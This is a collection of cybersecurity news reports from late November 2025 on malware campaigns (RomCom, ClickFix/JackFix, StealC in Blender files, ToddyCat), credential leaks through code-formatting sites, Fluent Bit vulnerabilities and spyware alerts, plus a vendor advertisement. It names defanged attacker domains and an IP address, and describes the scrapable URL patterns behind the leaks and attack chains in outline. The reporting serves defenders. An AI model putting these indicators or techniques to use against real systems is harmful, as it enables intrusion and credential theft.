Category: Cybersecurity

Nov 26, 2025Ravie LakshmananMalware / Cyber Espionage

The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent.

“This is the first time that a RomCom payload has been observed being distributed by SocGholish,” Arctic Wolf Labs researcher Jacob Faires said in a Tuesday report.

The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia’s Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. According to the cybersecurity company, the targeted entity had worked for a city with close ties to Ukraine in the past.

SocGholish (aka FakeUpdates), linked to a financially motivated operator tracked as TA569 (aka Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543), serves as an initial access broker, allowing other threat actors to drop a wide range of payloads. Some of its known customers are Evil Corp, LockBit, Dridex, and Raspberry Robin.

The attack chains typically involve serving fake browser update alerts for Google Chrome or Mozilla Firefox on legitimate-but-compromised websites to trick unsuspecting users into downloading malicious JavaScript that’s responsible for installing a loader, which then fetches additional malware.

For the most part, the attacks single out websites that are poorly secured, taking advantage of known security vulnerabilities in plugins to inject JavaScript code that’s designed to display the pop-up and activate the infection chain.

RomCom (aka Nebulous Mantis, Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), on the other hand, is the name assigned to a Russia-aligned threat actor that’s known to dabble in both cybercrime and espionage operations since at least 2022.

The threat actor leverages several methods, including spear-phishing and zero-day exploits, to breach target networks and drop the eponymous remote access trojan (RAT) on victim machines. Attacks mounted by the hacking group have singled out entities in Ukraine, as well as NATO-related defense organizations.

In the attack analyzed by Arctic Wolf, the fake update payload allows the threat actors to run commands on the compromised machine by means of a reverse shell established to a command-and-control (C2) server. This includes conducting reconnaissance and dropping a custom Python backdoor codenamed VIPERTUNNEL.

Also delivered is a RomCom-linked DLL loader that launches the Mythic Agent, a crucial component of the cross-platform, post-exploit, red teaming framework that communicates with a corresponding server to support command execution, file operations, and others.

While the attack was ultimately unsuccessful and was blocked before it could progress any further, the development shows the RomCom threat actor’s continued interest in targeting Ukraine or entities providing assistance to the country, no matter how tenuous the connection may be.

“The timeline from infection via [the fake update] to the delivery of RomCom’s loader was less than 30 minutes,” Jacob Faires said. “Delivery is not made until the target’s Active Directory domain has been verified to match a known value provided by the threat actor.”

“The widespread nature of SocGholish attacks and the relative speed at which the attack progresses from initial access to infection makes it a potent threat to organizations worldwide.”

The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes.

The activity targets individuals, businesses, and organizations of varied sizes and across sectors, the agency said, adding the fraudulent schemes have led to more than $262 million in losses since the start of the year. The FBI said it has received over 5,100 complaints.

ATO fraud typically refers to attacks that enable threat actors to obtain unauthorized access to an online financial institution, payroll system, or health savings account to siphon data and funds for personal gain. The access is often obtained by approaching targets through social engineering techniques, such as texts, calls, and emails that prey on users’ fears, or via bogus websites.

These methods make it possible for attackers to deceive users into providing their login credentials on a phishing site, in some instances, urging them to click on a link to report purported fraudulent transactions recorded against their accounts.

“A cybercriminal manipulates the account owner into giving away their login credentials, including multi-factor authentication (MFA) code or One-Time Passcode (OTP), by impersonating a financial institution employee, customer support, or technical support personnel,” the FBI said.

“The cybercriminal then uses login credentials to log into the legitimate financial institution website and initiate a password reset, ultimately gaining full control of the accounts.”

Other cases involve threat actors masquerading as financial institutions contacting account owners, claiming their information was used to make fraudulent purchases, including firearms, and then convincing them to provide their account information to a second cybercriminal impersonating law enforcement.

The FBI said ATO fraud can also involve the use of Search Engine Optimization (SEO) poisoning to trick users looking for businesses on search engines into clicking on phony links that redirect to a lookalike site by means of malicious search engine ads.

Regardless of the method used, the attacks have one aim: to seize control of the accounts and swiftly wire funds to other accounts under their control, and change the passwords, effectively locking out the account owner. The accounts to which the money is transferred are further linked to cryptocurrency wallets to convert them into digital assets and obscure the money trail.

“The large majority of ATO accounts referenced in the FBI announcement occur through compromised credentials used by threat actors intimately familiar with the internal processes and workflows for money movement within financial institutions,” Jim Routh, chief trust officer at Saviynt, said in a statement.

“The most effective controls to prevent these attacks are manual (phone calls for verification) and SMS messages for approval. The root cause continues to be the accepted use of credentials for cloud accounts despite having passwordless options available.”

The development comes as Darktrace, Flashpoint, Forcepoint, Fortinet, and Zimperium have highlighted the major cybersecurity threats ahead of the holiday season, including Black Friday scams, QR code fraud, gift card draining, and high-volume phishing campaigns that mimic popular brands like Amazon and Temu.

Many of these activities leverage artificial intelligence (AI) tools to produce highly persuasive phishing emails, fake websites, and social media ads, allowing even low-skill attackers to pull off attacks that appear trustworthy and increase the success rate of their campaigns.

Fortinet FortiGuard Labs said it detected at least 750 malicious, holiday-themed domains registered over the last three months, with many using key terms like “Christmas,” “Black Friday,” and “Flash Sale.” “Over the last three months, more than 1.57 million login accounts tied to major e-commerce sites, available through stealer logs, were collected across underground markets,” the company said.

Attackers have also been found actively exploiting security vulnerabilities across Adobe/Magento, Oracle E-Business Suite, WooCommerce, Bagisto, and other common e-commerce platforms. Some of the exploited vulnerabilities include CVE-2025-54236, CVE-2025-61882, and CVE-2025-47569.

According to Zimperium zLabs, there has been a 4x increase in mobile phishing (aka mishing) sites, with attackers leveraging trusted brand names to create urgency and deceive users into clicking, logging in, or downloading malicious updates.”

What’s more, Recorded Future has called attention to purchase scams where threat actors use fake e-commerce stores to steal victim data and authorize fraudulent payments for non-existent goods and services. It described the scams as a “major emerging fraud threat.”

“A sophisticated dark web ecosystem allows threat actors to quickly establish new purchase scam infrastructure and amplify their impact,” the company said. “Promotional activities mirroring traditional marketing – including an offer to sell stolen card data on the dark web carding shop PP24 – are widespread in this underground.”

“Threat actors fund ad campaigns with stolen payment cards to spread purchase scams, which in turn compromise more payment card data, fueling a continuing cycle of fraud.

Nov 25, 2025Ravie LakshmananData Exposure / Cloud Security

New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code.

Cybersecurity company watchTowr Labs said it captured a dataset of over 80,000 files on these sites, uncovering thousands of usernames, passwords, repository authentication keys, Active Directory credentials, database credentials, FTP credentials, cloud environment keys, LDAP configuration information, helpdesk API keys, meeting room API keys, SSH session recordings, and all kinds of personal information.

This includes five years of historical JSONFormatter content and one year of historical CodeBeautify content, totalling over 5GB worth of enriched, annotated JSON data.

Organizations impacted by the leak span critical national infrastructure, government, finance, insurance, banking, technology, retail, aerospace, telecommunications, healthcare, education, travel, and, ironically, cybersecurity sectors.

“These tools are extremely popular, often appearing near the top of search results for terms like ‘JSON beautify’ and ‘best place to paste secrets’ (probably, unproven) — and used by a wide variety of organizations, organisms, developers, and administrators in both enterprise environments and for personal projects,” security researcher Jake Knott said in a report shared with The Hacker News.

Both tools also offer the ability to save a formatted JSON structure or code, turning it into a semi-permanent, shareable link with others – effectively allowing anyone with access to the URL to access the data.

As it happens, the sites not only provide a handy Recent Links page to list all recently saved links, but also follow a predictable URL format for the shareable link, thereby making it easier for a bad actor to retrieve all URLs using a simple crawler –

• https://jsonformatter.org/{id-here}
• https://jsonformatter.org/{formatter-type}/{id-here}
• https://codebeautify.org/{formatter-type}/{id-here}

Some examples of leaked information include Jenkins secrets, a cybersecurity company exposing encrypted credentials for sensitive configuration files, Know Your Customer (KYC) information associated with a bank, a major financial exchange’s AWS credentials linked to Splunk, and Active Directory credentials for a bank.

To make matters worse, the company said it uploaded fake AWS access keys to one of these tools, and found bad actors attempting to abuse them 48 hours after it was saved. This indicates that valuable information exposed through these sources is being scraped by other parties and tested, posing severe risks.

“Mostly because someone is already exploiting it, and this is all really, really stupid,” Knott said. “We don’t need more AI-driven agentic agent platforms; we need fewer critical organizations pasting credentials into random websites.”

When checked by The Hacker News, both JSONFormatter and CodeBeautify have temporarily disabled the save functionality, claiming they are “working on to make it better” and implementing “enhanced NSFW (Not Safe For Work) content prevention measures.”

watchTowr said that the save functionality was disabled by these sites likely in response to the research. “We suspect this change occurred in September in response to communication from a number of the affected organizations we alerted,” it added.

Cybersecurity researchers are calling attention to a new campaign that’s leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a “critical” Windows security update.

“Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising,” Acronis said in a new report shared with The Hacker News. “The adult theme, and possible connection to shady websites, adds to the victim’s psychological pressure to comply with sudden ‘security update’ installation.”

ClickFix-style attacks have surged over the past year, typically tricking users into running malicious commands on their own machines using prompts for technical fixes or completing CAPTCHA verification checks. According to data from Microsoft, ClickFix has become the most common initial access method, accounting for 47% of attacks.

The latest campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code, indicating that attackers are moving away from the traditional robot-check lures. The activity has been codenamed JackFix by the Singapore-based cybersecurity company.

Perhaps the most concerning aspect of the attack is that the phony Windows update alert hijacks the entire screen and instructs the victim to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby triggering the infection sequence.

It’s assessed that the starting point of the attack is a fake adult site to which unsuspecting users are redirected via malvertising or other social engineering methods, only to suddenly serve them an “urgent security update.” Select iterations of the sites have been found to include developer comments in Russian, hinting at the possibility of a Russian-speaking threat actor.

“The Windows Update screen is created entirely using HTML and JavaScript code, and pops up as soon as the victim interacts with any element on the phishing site,” security researcher Eliad Kimhy said. “The page attempts to go full screen via JavaScript code, while at the same time creating a fairly convincing Windows Update window composed of a blue background and white text, reminiscent of Windows’ infamous blue screen of death.”

What’s notable about the attack is that it heavily leans on obfuscation to conceal ClickFix-related code, as well as blocks users from escaping the full-screen alert by disabling the Escape and F11 buttons, along with F5 and F12 keys. However, due to faulty logic, users can still press the Escape and F11 buttons to get rid of the full screen.

The downloaded PowerShell script also packs in various obfuscation and anti-analysis mechanisms, one of which is the use of garbage code to complicate analysis efforts. It also attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged.

To achieve privilege escalation, the malware uses the Start-Process cmdlet in conjunction with the “-Verb RunAs” parameter to launch PowerShell with administrative rights and continuously prompts for permission until it’s granted by the victim. Once this step is successful, the script is designed to drop additional payloads, such as simple remote access trojans (RATs) that are programmed to contact a C2 server, presumably to drop more malware.

The PowerShell script has also been observed to serve up to eight different payloads, with Acronis describing it as the “most egregious example of spray and pray.” These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, as well as other unspecified loaders and RATs.

“If only one of these payloads manages to run successfully, victims risk losing passwords, crypto wallets, and more,” Kimhy said. “In the case of a few of these loaders — the attacker may choose to bring in other payloads into the attack, and the attack can quickly escalate further.”

The disclosure comes as Huntress detailed a multi-stage malware execution chain that originates from a ClickFix lure masquerading as a Windows update and deploys stealer malware like Lumma and Rhadamanthys by concealing the final stages within an image, a technique known as steganography.

Like in the case of the aforementioned campaign, the ClickFix command copied to the clipboard and pasted into the Run dialog uses mshta.exe to run a JavaScript payload that’s capable of running a remotely-hosted PowerShell script directly in memory.

The PowerShell code is used to decrypt and launch a .NET assembly payload, a loader dubbed Stego Loader that serves as a conduit for the execution of Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.

Interestingly, one of the domains listed by Huntress as being used to fetch the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, suggesting these two activity clusters may be related.

“The threat actor often changes the URI (/tick.odd, /gpsc.dat, /ercx.dat, etc.) used to host the first mshta.exe stage,” security researchers Ben Folland and Anna Pham said in the report.

“Additionally, the threat actor moved from hosting the second stage on the domain securitysettings[.]live and instead hosted on xoiiasdpsdoasdpojas[.]com, although both point to the same IP address 141.98.80[.]175, which was also used to deliver the first stage [i.e., the JavaScript code run by mshta.exe].”

ClickFix has become hugely successful as it relies on a simple yet effective method, which is to entice a user into infecting their own machine and bypassing security controls. Organizations can defend against such attacks by training employees to better spot the threat and disabling the Windows Run box via Registry changes or Group Policy.

Nov 25, 2025Ravie LakshmananMalware / Vulnerability

The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool dubbed TCSectorCopy.

“This attack allows them to obtain tokens for the OAuth 2.0 authorization protocol using the user’s browser, which can be used outside the perimeter of the compromised infrastructure to access corporate mail,” Kaspersky said in a technical breakdown.

ToddyCat, assessed to be active since 2020, has a track record of targeting various organizations in Europe and Asia with various tools, Samurai and TomBerBil to retain access and steal cookies and credentials from web browsers like Google Chrome and Microsoft Edge.

Earlier this April, the hacking group was attributed to the exploitation of a security flaw in ESET Command Line Scanner (CVE-2024-11859, CVSS score: 6.8) to deliver a previously undocumented malware codenamed TCESB.

Kaspersky said it detected a PowerShell variant of TomBerBil (as opposed to C++ and C# versions flagged before) in attacks that took place between May and June 2024, which comes with capabilities to extract data from Mozilla Firefox. A notable feature of this version is that it runs on domain controllers from a privileged user and can access browser files via shared network resources using the SMB protocol.

The malware, the company added, was launched by means of a scheduled task that executed a PowerShell command. Specifically, it searches for browser history, cookies, and saved credentials in the remote host over SMB. While the copied files containing the information are encrypted using the Windows Data Protection API (DPAPI), TomBerBil is equipped to capture the encryption key necessary to decrypt the data.

“The previous version of TomBerBil ran on the host and copied the user token. As a result, DPAPI was used to decrypt the master key in the user’s current session, and subsequently the files themselves,” researchers said. “In the newer server version, TomBerBil copies files containing user encryption keys that are used by DPAPI. Using these keys, as well as the user’s SID and password, attackers can decrypt all copied files locally.”

The threat actors have also been found to access corporate emails stored in local Microsoft Outlook storage in the form of OST (short for Offline Storage Table) files using TCSectorCopy (“xCopy.exe”), bypassing restrictions that limit access to such files when the application is running.

Written in C++, TCSectorCopy accepts as input a file to be copied (in this case, OST files) and then proceeds to open the disk as a read-only device and sequentially copy the file contents sector by sector. Once the OST files are written to a path of the attacker’s choosing, the contents of the electronic correspondence are extracted using XstReader, an open-source viewer for Outlook OST and PST files.

Another tactic adopted by ToddyCat involves efforts to obtain access tokens directly from memory in cases where victim organizations used the Microsoft 365 cloud service. The JSON web tokens (JWTs) are obtained through an open-source C# tool named SharpTokenFinder, which enumerates Microsoft 365 applications for plain text authentication tokens.

But the threat actor is said to have faced a setback in at least one investigated incident after security software installed on the system blocked SharpTokenFinder’s attempt to dump the Outlook.exe process. To get around this restriction, the operator used the ProcDump tool from the Sysinternals package with specific arguments to take a memory dump of the Outlook process.

“The ToddyCat APT group is constantly developing its techniques and looking for those that would hide activity to gain access to corporate correspondence within the compromised infrastructure,” Kaspersky said.

2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns.

The Storm on the Horizon

Global world instability, coupled with rapid technological advancement, will force security teams to adapt not just their defensive technologies but their entire workforce approach. The average SOC already processes about 11,000 alerts daily, but the volume and sophistication of threats are accelerating. For business leaders, this translates to direct impacts on operational continuity, regulatory compliance, and bottom-line financials.

SOCs that can’t keep pace won’t just struggle; they’ll fail spectacularly. Solve these three core issues now, or pay dearly later.

1. Evasive Threats Are Slipping Through—And Getting Smarter Fast

Attackers have mastered evasion. ClickFix campaigns trick employees into pasting malicious PowerShell commands by themselves. LOLBins are abused to hide malicious behavior. Multi-stage phishing hides behind QR codes, CAPTCHAs, rewritten URLs, and fake installers. Traditional sandboxes stall because they can’t click “Next,” solve challenges, or follow human-dependent flows. Result? Low detection rates for the exact threats exploding in 2025 and beyond.

Fix it with interactive malware analysis

ANY.RUN’s Interactive Sandbox with Automated Interactivity uses machine learning to automatically interact with malware samples, bypassing CAPTCHAs on phishing sites and completing necessary actions to force malware execution. The platform doesn’t just observe, it actively engages with threats the way a human analyst would, but at machine speed.

ANY.RUN’s Sandbox processes a link from a QR code

Through Smart Content Analysis, the sandbox automatically identifies and detonates key components at each stage of the attack chain. It extracts URLs from QR codes, removes security rewrites from modified links, bypasses multi-stage redirects, processes email attachments, and executes payloads hidden within archives.

Sandbox automatically running a PowerShell command in a ClickFix attack

The business impact is immediate. By revealing the full attack chain in real time, ANY.RUN enables SOC teams to uncover entire attack sequences, retrieve IOCs, and refine detection rules within seconds rather than hours.

ANY.RUN’s Threat Intelligence Lookup and TI Feeds transform alert triage by delivering 24× more IOCs per incident from 15,000+ SOC environments conducting real-world investigations, providing instant, deep context on emerging threats so analysts can confirm and contain attacks in seconds.

Instead of starting every investigation from scratch, analysts query a single artifact and instantly receive complete intelligence: indicator verdict, geotargeting and urgency, associated campaigns, targeting patterns, related indicators, and MITRE ATT&CK mappings.

Suspicious domain verdict: freshly spotted, belongs to Lumma stealer

The sandbox integration is particularly helpful for junior analysts who may lack the skills and experience required for advanced malware analysis.

3. Proving ROI: Making the Business Case for Cyber Defense

From a financial leadership perspective, security spending often feels like a black hole: money is spent, but risk reduction is hard to quantify. SOCs are challenged to justify investments, especially when security teams seem to be a cost center without clear profit or business-driving impact.

ANY.RUN shows that threat intelligence can actually save money and deliver business value. Here’s how:

• Preventing Breaches: Threat Intelligence Feeds provide real-time IOCs collected from live sandbox investigations across 15,000+ organizations, helping prevent attacks before they hit.
• Reducing False Positives: By filtering out low-risk alerts and surfacing only high-confidence malicious indicators, SOC teams spend less time chasing noise.
• Automating Triage: Enrich alerts with contextual intelligence automatically (via API/SDK), reducing Tier 1 workload, lowering overtime and turnover costs.
• Faster Response: TI Lookup links each IOC to a sandbox report, giving complete visibility into how malware behaves — enabling faster, more effective containment.
• Continuous Updating: TI Feeds are continuously refreshed with unique, verified IOCs, helping your SOC stay ahead of emerging threats without manual research.

Why this matters for 2026: In an era where cyber risk can directly impact financial performance, being able to demonstrate that security investments reduce risk, save resources, and improve operational efficiency is essential. Modern threat intelligence from ANY.RUN turns the SOC from a cost center into a value-generating asset.

Take Control Before 2026 Hits

AI is rewriting the rules of cyber defense. Evasive threats, alert overload, and budget scrutiny aren’t future problems, they’re today’s warnings. Tackle them with interactive analysis and real-time intelligence that actually works. Future-proof your SOC, keep your team sane, and turn security into a business asset.

Nov 25, 2025Ravie LakshmananMalware / Browser Security

Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2.

“This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,” Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.

“Users unknowingly download these 3D model files, which are designed to execute embedded Python scripts upon opening in Blender — a free, open-source 3D creation suite.”

The cybersecurity company said the activity shares similarities with a prior campaign linked to Russian-speaking threat actors that involved impersonating the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2.

This assessment is based on tactical similarities in both campaigns, including using decoy documents, evasive techniques, and background execution of malware.

The latest set of attacks abuses the ability to embed Python scripts in .blend files like character rigs that are automatically executed when they are opened in scenarios where the Auto Run option is enabled. This behavior can be dangerous as it opens the door to the execution of arbitrary Python scripts.

The security risk has been acknowledged by Blender in its own documentation, which states: “The ability to include Python scripts within blend-files is valuable for advanced tasks such as rigging and automation. However, it poses a security risk since Python does not restrict what a script can do.”

The attack chains essentially involve uploading malicious .blend files to free 3D asset sites such as CGTrader containing a malicious “Rig_Ui.py” script, which is executed as soon as they are opened with Blender’s Auto Run feature enabled. This, in turn, fetches a PowerShell script to download two ZIP archives.

While one of the ZIP files contains a payload for StealC V2, the second archive deploys a secondary Python-based stealer on the compromised host. The updated version of StealC, first announced in late April 2025, supports a wide range of information gathering features, allowing data to be extracted from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.

“Keep Auto Run disabled unless the file source is trusted,” Morphisec said. “Attackers exploit Blender that typically runs on physical machines with GPUs, bypassing sandboxes and virtual environments.”

Nov 25, 2025Ravie LakshmananSpyware / Mobile Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday issued an alert warning of bad actors actively leveraging commercial spyware and remote access trojans (RATs) to target users of mobile messaging applications.

“These cyber actors use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app, facilitating the deployment of additional malicious payloads that can further compromise the victim’s mobile device,” the agency said.

CISA cited as examples multiple campaigns that have come to light since the start of the year. Some of them include –

• The targeting of the Signal messaging app by multiple Russia-aligned threat actors by taking advantage of the service’s “linked devices” feature to hijack target user accounts
• Android spyware campaigns codenamed ProSpy and ToSpy that impersonate apps like Signal and ToTok to target users in the United Arab Emirates to deliver malware that establishes persistent access to compromised Android devices and exfiltrates data
• An Android spyware campaign called ClayRat has targeted users in Russia using Telegram channels and lookalike phishing pages by impersonating popular apps like WhatsApp, Google Photos, TikTok, and YouTube to trick users into installing them and steal sensitive data
• A targeted attack campaign that likely chained two security flaws in iOS and WhatsApp (CVE-2025-43300 and CVE-2025-55177) to target fewer than 200 WhatsApp users
• A targeted attack campaign that involved the exploitation of a Samsung security flaw (CVE-2025-21042) to deliver an Android spyware dubbed LANDFALL to Galaxy devices in the Middle East

The agency said the threat actors use multiple tactics to achieve compromise, including device-linking QR codes, zero-click exploits, and distributing spoofed versions of messaging apps.

CISA also pointed out that these activities focus on high-value individuals, primarily current and former high-ranking government, military, and political officials, along with civil society organizations and individuals across the United States, the Middle East, and Europe.

To counter the threat, the agency is urging highly targeted individuals to review and adhere to the following best practices –

• Only use end-to-end encrypted (E2EE) communications
• Enable Fast Identity Online (FIDO) phishing-resistant authentication
• Move away from Short Message Service (SMS)-based multi-factor authentication (MFA)
• Use a password manager to store all passwords
• Set a telecommunications provider PIN to secure mobile phone accounts
• Periodically update software
• Opt for the latest hardware version from the cell phone manufacturer to maximize security benefits
• Do not use a personal virtual private network (VPN)
• On iPhones, enable Lockdown Mode, enroll in iCloud Private Relay, and review and restrict sensitive app permissions
• On Android phones, choose phones from manufacturers with strong security track records, only use Rich Communication Services (RCS) if E2EE is enabled, turn on Enhanced Protection for Safe Browsing in Chrome, ensure Google Play Protect is on, and audit and limit app permissions

Nov 24, 2025Ravie LakshmananVulnerability / Container Security

Cybersecurity researchers have discovered five vulnerabilities in Fluent Bit, an open-source and lightweight telemetry agent, that could be chained to compromise and take over cloud infrastructures.

The security defects “allow attackers to bypass authentication, perform path traversal, achieve remote code execution, cause denial-of-service conditions, and manipulate tags,” Oligo Security said in a report shared with The Hacker News.

Successful exploitation of the flaws could enable attackers to disrupt cloud services, manipulate data, and burrow deeper into cloud and Kubernetes infrastructure. The list of identified vulnerabilities is as follows –

• CVE-2025-12972 – A path traversal vulnerability stemming from the use of unsanitized tag values to generate output filenames, making it possible to write or overwrite arbitrary files on disk, enabling log tampering and remote code execution.
• CVE-2025-12970 – A stack buffer overflow vulnerability in the Docker Metrics input plugin (in_docker) that could allow attackers to trigger code execution or crash the agent by creating containers with excessively long names.
• CVE-2025-12978 – A vulnerability in the tag-matching logic lets attackers spoof trusted tags – which are assigned to every event ingested by Fluent Bit – by guessing only the first character of a Tag_Key, allowing an attacker to reroute logs, bypass filters, and inject malicious or misleading records under trusted tags.
• CVE-2025-12977 – An improper input validation of tags derived from user-controlled fields, allowing an attacker to inject newlines, traversal sequences, and control characters that can corrupt downstream logs.
• CVE-2025-12969 – A missing security.users authentication in the in_forward plugin that’s used to receive logs from other Fluent Bit instances using the Forward protocol, allowing attackers to send logs, inject false telemetry, and flood a security product’s logs with false events.

“The amount of control enabled by this class of vulnerabilities could allow an attacker to breach deeper into a cloud environment to execute malicious code through Fluent Bit, while dictating which events are recorded, erasing or rewriting incriminating entries to hide their tracks after an attack, injecting fake telemetry, and injecting plausible fake events to mislead responders,” researchers said.

Following responsible disclosure, the issues have been addressed in versions 4.1.1 and 4.0.12 released last month. Amazon Web Services (AWS), which also engaged in coordinated disclosure, has urged customers running Fluentbit to update to the latest version for optimal protection.

Given Fluent Bit’s popularity within enterprise environments, the shortcomings have the potential to impair access to cloud services, allow data tampering, and seize control of the logging service itself.

Other recommended actions include avoiding use of dynamic tags for routing, locking down output paths and destinations to prevent tag-based path expansion or traversal, mounting /fluent-bit/etc/ and configuration files as read-only to block runtime tampering, and running the service as non-root users.

The development comes more than a year after Tenable detailed a flaw in Fluent Bit’s built-in HTTP server (CVE-2024-4323 aka Linguistic Lumberjack) that could be exploited to achieve denial-of-service (DoS), information disclosure, or remote code execution.

Nov 24, 2025Ravie LakshmananCybersecurity / Hacking News

This week saw a lot of new cyber trouble. Hackers hit Fortinet and Chrome with new 0-day bugs. They also broke into supply chains and SaaS tools. Many hid inside trusted apps, browser alerts, and software updates.

Big firms like Microsoft, Salesforce, and Google had to react fast — stopping DDoS attacks, blocking bad links, and fixing live flaws. Reports also showed how fast fake news, AI risks, and attacks on developers are growing.

Here’s what mattered most in security this week.

⚡ Threat of the Week

Fortinet Warns of Another Silently Patched and Actively Exploited FortiWeb Flaw — Fortinet has warned that a new security flaw in FortiWeb has been exploited in the wild. The medium-severity vulnerability, tracked as CVE-2025-58034, carries a CVSS score of 6.7 out of a maximum of 10.0. It has been addressed in version 8.0.2. “An Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) vulnerability [CWE-78] in FortiWeb may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands,” the company said. The development came days after Fortinet confirmed that it silently patched another critical FortiWeb vulnerability (CVE-2025-64446, CVSS score: 9.1) in version 8.0.2. Although the company has not clarified if the exploitation activity is linked, Orange Cyberdefense said it observed “several exploitation campaigns” chaining CVE-2025-58034 with CVE-2025-64446 to facilitate authentication bypass and command injection. Fortinet’s handling of the issue has come in for heavy criticism. It’s possible that the company was aware but chose not to disclose them to avoid alerting other threat actors to their existence until a majority of its customers had applied the patch. But what’s difficult to explain at this stage is why Fortinet opted to disclose the flaws four days apart.

• Google Patches New Actively Exploited Chrome 0-Day — Google released security updates for its Chrome browser to address two security flaws, including one that has come under active exploitation in the wild. The vulnerability in question is CVE-2025-13223 (CVSS score: 8.8), a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could be exploited to achieve arbitrary code execution or program crashes. Clément Lecigne of Google’s Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on November 12, 2025. Google has not shared any details on who is behind the attacks, who may have been targeted, or the scale of such efforts. However, the tech giant acknowledged that an “exploit for CVE-2025-13223 exists in the wild.” With the latest update, Google has addressed seven zero-day flaws in Chrome that have been either actively exploited or demonstrated as a proof-of-concept (PoC) since the start of the year.
• Matrix Push C2 Uses Browser Extensions to Take Users to Phishing Pages — Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push C2. In these attacks, prospective targets are tricked into allowing browser notifications through social engineering on malicious or legitimate-but-compromised websites. Once a user agrees to receive notifications from the site, the attackers take advantage of the web push notification mechanism built into the web browser to send alerts that look like they have been sent by the operating system or the browser itself. The service is available for about $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. The fact that the tool is platform-agnostic means it could be favoured by threat actors looking to conduct credential theft, payment fraud, and cryptocurrency scams. Countering such risks requires browser vendors to implement stronger abuse protections, such as using a reputation system to flag sketchy sites and automatically revoking notification permissions for suspicious sites.
• PlushDaemon APT Uses EdgeStepper to Hijack Software Updates — The threat actor known as PlushDaemon has been observed using a previously undocumented Go-based network backdoor codenamed EdgeStepper to facilitate adversary-in-the-middle (AitM) attacks. EdgeStepper is positioned between a victim and the network edge, tracking requests for certain popular Chinese software products, such as the Sogou Pinyin Method input editor, the Baidu Netdisk cloud service, multipurpose instant messenger Tencent QQ, and the free office suite WPS Office. If one such software update request is found EdgeStepper will redirect it to PlushDaemon’s infrastructure, resulting in the download of a trojanized update. The attacks lead to the deployment of SlowStepper.
• Salesforce Warns of Unauthorized Data Access via Gainsight-Linked Apps — Salesforce alerted customers of “unusual activity” related to Gainsight-published applications connected to the platform. The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues. Gainsight said the Gainsight app has been temporarily pulled from the HubSpot Marketplace and Zendesk connector access has been revoked as a precautionary measure. The campaign has been attributed by Google to ShinyHunters, with the group assessed to have stolen data from more than 200 potentially affected Salesforce instances. Cybersecurity company CrowdStrike also said it terminated a “suspicious insider” last month for allegedly passing insider information to Scattered LAPSUS$ Hunters. A member of the extortionist crew told The Register they obtained access to Gainsight following the Salesloft Drift hack earlier this year. The incident once again underscores the security risk posed by the SaaS integration supply chain, where breaching a single vendor acts as a gateway into dozens of downstream environments.
• Microsoft Mitigates Record 15.72 Tbps DDoS Attack — Microsoft disclosed that it automatically detected and neutralized a distributed denial-of-service (DDoS) attack targeting a single endpoint in Australia that measured 15.72 terabits per second (Tbps) and nearly 3.64 billion packets per second (pps). The tech giant said it was the largest DDoS attack ever observed in the cloud, and that it originated from a TurboMirai-class Internet of Things (IoT) botnet known as AISURU. It’s currently not known who was targeted by the attack. According to data from QiAnXin XLab, the AISURU botnet is powered by nearly 300,000 infected devices, most of which are routers, security cameras, and DVR systems. It has been attributed to some of the biggest DDoS attacks recorded to date. In a report published last month, NETSCOUT classified the DDoS-for-hire botnet as operating with a restricted clientele. QiAnXin XLab told The Hacker News that a botnet named Kimwolf is likely linked to the group behind AISURU, adding one of Kimwolf’s C2 domains recently surpassed Google in Cloudflare’s list of top 100 domains, specifically, 14emeliaterracewestroxburyma02132[.]su.

‎️‍🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected.

